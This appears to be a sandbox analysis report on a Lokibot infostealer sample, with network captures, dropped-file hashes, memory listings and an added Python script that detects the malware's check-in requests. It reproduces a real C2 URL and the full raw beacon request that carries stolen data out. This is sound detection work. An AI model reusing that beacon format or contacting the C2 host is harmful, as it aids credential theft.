    Process: a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
    Bytes: 670 B / 1.0kB; packets: 6 / 6
    HTTP Request: POST http://rocheholding.top/evie3/five/fre.php
    HTTP Response: 522
  • 204.79.197.200:443 (tls, http2)
    Name: tse1.mm.bing.net
    Bytes: 1.2kB / 8.1kB; packets: 16 / 13
  • 204.79.197.200:443 (tls, http2)
    Name: tse1.mm.bing.net
    Bytes: 1.2kB / 8.1kB; packets: 16 / 13
  • 204.79.197.200:443 (tls, http2)
    Name: tse1.mm.bing.net
    Bytes: 1.2kB / 8.1kB; packets: 16 / 14
  • 204.79.197.200:443 (tls, http2)
    URL: https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Bytes: 73.1kB / 2.1MB; packets: 1539 / 1532
    HTTP Requests (each answered 200):
      GET https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
      GET https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
      GET https://tse1.mm.bing.net/th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
      GET https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    HTTP Responses: 200, 200, 200, 200
  • 8.8.8.8:53 (dns)
    Name: 8.8.8.8.in-addr.arpa
    Bytes: 66 B / 90 B; packets: 1 / 1
    DNS Request: 8.8.8.8.in-addr.arpa
  • 8.8.8.8:53 (dns)
    Name: 232.168.11.51.in-addr.arpa
    Bytes: 72 B / 158 B; packets: 1 / 1
    DNS Request: 232.168.11.51.in-addr.arpa
  • 8.8.8.8:53 (dns)
    Name: 172.210.232.199.in-addr.arpa
    Bytes: 74 B / 128 B; packets: 1 / 1
    DNS Request: 172.210.232.199.in-addr.arpa
  • 8.8.8.8:53 (dns)
    Name: 209.205.72.20.in-addr.arpa
    Bytes: 72 B / 158 B; packets: 1 / 1
    DNS Request: 209.205.72.20.in-addr.arpa
  • 8.8.8.8:53 (dns)
    Name: rocheholding.top
    Process: a931d90917d9b468079b068260dcda537beb7d51fb68048f783d2baa80118803.exe
    Bytes: 62 B / 94 B; packets: 1 / 1
    DNS Request: rocheholding.top
    DNS Response: 172.67.165.74, 104.21.65.180
  • 8.8.8.8:53 (dns)
    Name: 57.169.31.20.in-addr.arpa
    Bytes: 213 B / 157 B; packets: 3 / 1
    DNS Requests: 3 for 57.169.31.20.in-addr.arpa (one reply, no PTR record shown)
  • 8.8.8.8:53 (dns)
    Name: 168.61.62.23.in-addr.arpa
    Bytes: 355 B / 135 B; packets: 5 / 1
    DNS Requests: 5 for 168.61.62.23.in-addr.arpa
  • 8.8.8.8:53 (dns)
    Name: 241.150.49.20.in-addr.arpa
    Bytes: 360 B sent; packets: 5 sent, no reply
    DNS Requests: 5 for 241.150.49.20.in-addr.arpa
  • 8.8.8.8:53 (dns)
    Name: 28.118.140.52.in-addr.arpa
    Bytes: 288 B / 158 B; packets: 4 / 1
    DNS Requests: 4 for 28.118.140.52.in-addr.arpa
  • 8.8.8.8:53 (dns)
    Name: 74.165.67.172.in-addr.arpa
    Bytes: 144 B / 134 B; packets: 2 / 1
    DNS Requests: 2 for 74.165.67.172.in-addr.arpa
  • 8.8.8.8:53 (dns)
    Name: 157.123.68.40.in-addr.arpa
    Bytes: 360 B / 146 B; packets: 5 / 1
    DNS Requests: 5 for 157.123.68.40.in-addr.arpa
  • 8.8.8.8:53 (dns)
    Name: 206.23.85.13.in-addr.arpa
    Bytes: 213 B / 145 B; packets: 3 / 1
    DNS Requests: 3 for 206.23.85.13.in-addr.arpa
  • 8.8.8.8:53 (dns)
    Name: 25.24.18.2.in-addr.arpa
    Bytes: 69 B / 131 B; packets: 1 / 1
    DNS Request: 25.24.18.2.in-addr.arpa
  • 8.8.8.8:53 (dns)
    Name: 18.24.18.2.in-addr.arpa
    Bytes: 69 B / 131 B; packets: 1 / 1
    DNS Request: 18.24.18.2.in-addr.arpa
  • 8.8.8.8:53 (dns)
    Name: tse1.mm.bing.net
    Bytes: 62 B / 173 B; packets: 1 / 1
    DNS Request: tse1.mm.bing.net
    DNS Response: 204.79.197.200, 13.107.21.200
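The three POSTs to rocheholding.top share a request shape that is a dependable Lokibot check-in signature: an HTTP/1.0 POST to a path ending in fre.php, the User-Agent "Mozilla/4.08 (Charon; Inferno)", a Content-Key header, and an application/octet-stream body marked Content-Encoding: binary. The reply is also worth reading correctly: a Cloudflare 522 means the edge accepted the request, body included, but the origin never answered, so this run proves beaconing and that the 358, 180 and 153-byte bodies left the host, not that the C2 was alive. The following added example (not tria.ge code) scores raw requests against that shape and classifies the reply; the captured request and response are reproduced from this report, while the benign request, the trait weights and the threshold are constructed assumptions.

```python
"""Score raw HTTP requests against the Lokibot check-in shape and classify the
C2 reply.  Added example; not tria.ge code.  Captured request/response are
reproduced from the report; benign request, weights and threshold are assumed."""
from __future__ import annotations

LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"
BEACON_THRESHOLD = 3  # assumed: the UA alone, or Content-Key plus one more trait
WEIGHTS = {"lokibot_user_agent": 3, "content_key_header": 2,
           "post_to_fre_php": 1, "http10_binary_octet_stream": 1}


def parse_http_message(raw: str) -> dict:
    """Start line plus a lower-cased header map from a raw HTTP/1.x head."""
    lines = raw.strip("\r\n").splitlines()
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():      # blank line ends the head; ignore any body
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"start": lines[0].strip(), "headers": headers}


def score_lokibot_beacon(raw_request: str) -> tuple[int, list[str]]:
    """Weighted trait match; returns (score, matched trait names in order)."""
    msg = parse_http_message(raw_request)
    method, path, version = (msg["start"].split() + ["", "", ""])[:3]
    h = msg["headers"]
    hits: list[str] = []
    if h.get("user-agent") == LOKIBOT_UA:
        hits.append("lokibot_user_agent")
    if "content-key" in h:
        hits.append("content_key_header")
    if method == "POST" and path.lower().endswith("fre.php"):
        hits.append("post_to_fre_php")
    if (version == "HTTP/1.0"
            and h.get("content-encoding", "").lower() == "binary"
            and h.get("content-type", "").startswith("application/octet-stream")):
        hits.append("http10_binary_octet_stream")
    return sum(WEIGHTS[x] for x in hits), hits


def is_lokibot_beacon(raw_request: str) -> bool:
    return score_lokibot_beacon(raw_request)[0] >= BEACON_THRESHOLD


def classify_c2_reply(raw_response: str) -> str:
    """Separate a live C2 answer from an edge error: Cloudflare 522 means the
    edge accepted the request (and its body) but the origin never answered."""
    msg = parse_http_message(raw_response)
    status = int(msg["start"].split()[1])
    server = msg["headers"].get("server", "").lower()
    if status == 522 and server == "cloudflare":
        return "edge_accepted_origin_down"
    if 200 <= status < 300:
        return "c2_answered"
    return f"other_{status}"


# Reproduced from the report (first of the three POSTs).
CAPTURED_REQUEST = """POST /evie3/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: rocheholding.top
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 21507074
Content-Length: 358
Connection: close
"""

CAPTURED_RESPONSE = """HTTP/1.1 522
Date: Wed, 29 May 2024 11:17:22 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 15
Connection: close
Server: cloudflare
"""

# Constructed benign request modelled on the Bing image fetch in the same capture.
BENIGN_REQUEST = """GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2 HTTP/2.0
host: www.bing.com
accept: */*
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
"""

if __name__ == "__main__":
    for label, req in (("captured", CAPTURED_REQUEST), ("benign", BENIGN_REQUEST)):
        score, hits = score_lokibot_beacon(req)
        print(f"{label}: score={score} beacon={is_lokibot_beacon(req)} hits={hits}")
    print("reply:", classify_c2_reply(CAPTURED_RESPONSE))
```

The User-Agent and Content-Key traits are each specific enough to alert on alone; the path and HTTP/1.0 traits are only corroboration, because fre.php and HTTP/1.0 also occur in unrelated traffic. Fed with the three captured POSTs this scores 7 for each and reports the reply as an edge error, which is the right triage outcome: confirmed infostealer beaconing, C2 origin unreachable at analysis time.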

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    20e94c6501751ea49524b26d8fe86a29

    SHA1

    401d47819e8c19ec5194883bbf11aa990ee7df51

    SHA256

    46c9f1e777c504bddc199833473785365bee2af9611bc662168d1ab9141137c4

    SHA512

    39387884ccd1cc304fe8106c9729113c331333310f763bcd7d9fa4ead0fd726397bd010e2b637dfe938b7f1080cd16cfb3a38503d4d234b82b600890b810836c

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g3y4r1gt.eza.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\tmp786C.tmp

    Filesize

    1KB

    MD5

    0351645d2e04e6cf64b62abba7474c76

    SHA1

    9bd05c3bbccd65c0ca01899049961f3e4840f2bd

    SHA256

    cc555d09af576135970fa862f54eea34825cada485e519a3c7809cf6b55f1f90

    SHA512

    89114a45349d0c318e45596e93573224a2be598e6598c53ac09a21ce1a1030acbd20ecfc54c53d3d7919c8dfc3e74a5d03b07771d0338f847377ff430bd11406

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4124900551-4068476067-3491212533-1000\0f5007522459c86e95ffcc62f32308f1_310807ab-751f-4d81-ae09-b202eaf21e19

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • memory/1892-63-0x0000000006C20000-0x0000000006CC3000-memory.dmp

    Filesize

    652KB

  • memory/1892-92-0x0000000075320000-0x0000000075AD0000-memory.dmp

    Filesize

    7.7MB

  • memory/1892-84-0x00000000072B0000-0x00000000072CA000-memory.dmp

    Filesize

    104KB

  • memory/1892-81-0x0000000007170000-0x0000000007181000-memory.dmp

    Filesize

    68KB

  • memory/1892-80-0x00000000071F0000-0x0000000007286000-memory.dmp

    Filesize

    600KB

  • memory/1892-26-0x0000000005670000-0x00000000059C4000-memory.dmp

    Filesize

    3.3MB

  • memory/1892-62-0x0000000006BF0000-0x0000000006C0E000-memory.dmp

    Filesize

    120KB

  • memory/1892-51-0x0000000006BB0000-0x0000000006BE2000-memory.dmp

    Filesize

    200KB

  • memory/1892-52-0x0000000070930000-0x000000007097C000-memory.dmp

    Filesize

    304KB

  • memory/1892-22-0x0000000004C80000-0x0000000004CA2000-memory.dmp

    Filesize

    136KB

  • memory/1892-23-0x0000000004E20000-0x0000000004E86000-memory.dmp

    Filesize

    408KB

  • memory/1892-20-0x0000000075320000-0x0000000075AD0000-memory.dmp

    Filesize

    7.7MB

  • memory/1892-21-0x0000000075320000-0x0000000075AD0000-memory.dmp

    Filesize

    7.7MB

  • memory/1892-85-0x0000000007290000-0x0000000007298000-memory.dmp

    Filesize

    32KB

  • memory/1892-24-0x0000000005600000-0x0000000005666000-memory.dmp

    Filesize

    408KB

  • memory/2128-46-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2128-45-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2128-108-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2708-16-0x0000000075320000-0x0000000075AD0000-memory.dmp

    Filesize

    7.7MB

  • memory/2708-19-0x0000000075320000-0x0000000075AD0000-memory.dmp

    Filesize

    7.7MB

  • memory/2708-18-0x0000000075320000-0x0000000075AD0000-memory.dmp

    Filesize

    7.7MB

  • memory/2708-88-0x0000000075320000-0x0000000075AD0000-memory.dmp

    Filesize

    7.7MB

  • memory/2708-50-0x00000000063B0000-0x00000000063FC000-memory.dmp

    Filesize

    304KB

  • memory/2708-48-0x0000000006080000-0x000000000609E000-memory.dmp

    Filesize

    120KB

  • memory/2708-17-0x0000000005260000-0x0000000005888000-memory.dmp

    Filesize

    6.2MB

  • memory/2708-82-0x00000000075D0000-0x00000000075DE000-memory.dmp

    Filesize

    56KB

  • memory/2708-15-0x0000000004AC0000-0x0000000004AF6000-memory.dmp

    Filesize

    216KB

  • memory/2708-64-0x0000000070930000-0x000000007097C000-memory.dmp

    Filesize

    304KB

  • memory/2708-83-0x00000000075E0000-0x00000000075F4000-memory.dmp

    Filesize

    80KB

  • memory/2708-77-0x00000000079F0000-0x000000000806A000-memory.dmp

    Filesize

    6.5MB

  • memory/2708-78-0x00000000073A0000-0x00000000073BA000-memory.dmp

    Filesize

    104KB

  • memory/2708-79-0x0000000007420000-0x000000000742A000-memory.dmp

    Filesize

    40KB

  • memory/4724-0-0x000000007532E000-0x000000007532F000-memory.dmp

    Filesize

    4KB

  • memory/4724-8-0x0000000008EA0000-0x0000000008EB0000-memory.dmp

    Filesize

    64KB

  • memory/4724-9-0x0000000009120000-0x0000000009182000-memory.dmp

    Filesize

    392KB

  • memory/4724-10-0x0000000007AD0000-0x0000000007B6C000-memory.dmp

    Filesize

    624KB

  • memory/4724-7-0x0000000008E90000-0x0000000008E9C000-memory.dmp

    Filesize

    48KB

  • memory/4724-6-0x00000000082C0000-0x00000000082D6000-memory.dmp

    Filesize

    88KB

  • memory/4724-49-0x0000000075320000-0x0000000075AD0000-memory.dmp

    Filesize

    7.7MB

  • memory/4724-5-0x0000000001980000-0x000000000198A000-memory.dmp

    Filesize

    40KB

  • memory/4724-4-0x0000000075320000-0x0000000075AD0000-memory.dmp

    Filesize

    7.7MB

  • memory/4724-3-0x0000000007D20000-0x0000000007DB2000-memory.dmp

    Filesize

    584KB

  • memory/4724-2-0x00000000082D0000-0x0000000008874000-memory.dmp

    Filesize

    5.6MB

  • memory/4724-1-0x0000000000DD0000-0x0000000000E5E000-memory.dmp

    Filesize

    568KB
